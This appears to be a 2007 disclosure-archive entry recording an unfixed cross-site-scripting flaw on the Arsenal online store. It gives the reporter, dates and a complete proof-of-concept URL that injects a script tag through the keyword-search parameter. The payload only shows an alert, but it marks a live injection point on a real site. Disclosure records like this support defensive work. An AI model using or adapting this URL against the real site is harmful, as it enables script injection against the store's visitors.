Security researcher WhatALegend, has submitted on 10/09/2007 a cross-site-scripting (XSS) vulnerability affecting onlinestore.arsenal.com, which at the time of submission ranked 2361 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 12/09/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 10/09/2007 |
Date published: 12/09/2007 |
Fixed? Mail us! | Status:  UNFIXED |
| Author: WhatALegend |
Domain: onlinestore.arsenal.com |
Category: XSS |
Pagerank: 2361 |
|---|
URL: http://onlinestore.arsenal.com/bin/venda?ex=co_wizr-locayta&template=wz_locayta&pageno=1&itemsperpag
e=10&collate=ivtype%3Aprice%3Apcatid%3Acolour%3Adepartment%3Agender%3Abagstyle%3Abrand%3Aauthor%3Afo
rmat%3Aedition%3Aoccasion%3Acardformat%3Aevent%3Asize%3Ametal%3Alanguage%3Anecktype%3Asleevelength%3
Aduration%3Aacctype%3Afootballsize%3Aglovestyle%3Aglovessize%3Aheadwsize%3Aheadwstyle%3Aimagesize%3A
imagetype%3Ajackettype%3Ajewelltype%3Aclothesstyle%3Amediaformat%3Asubscriptype%3Astationarytype%3At
oystype&fieldinvt=type&termtextinvt=invt&typeinvt=exact&fieldpcatid=pcatid&termtextpcatid=shop&typep
catid=exact&typekeywordsearch=keyword&fieldivtype=ivtype&typeivtype=exact&threshold=1&termtextivtype
=&termtextkeywordsearch=%3Cscript%3Ealert%28%22XSS-By+WAL%22%29%3B%3C%2Fscript%3E |
|
Click here to view the mirror
|
|
|
| 
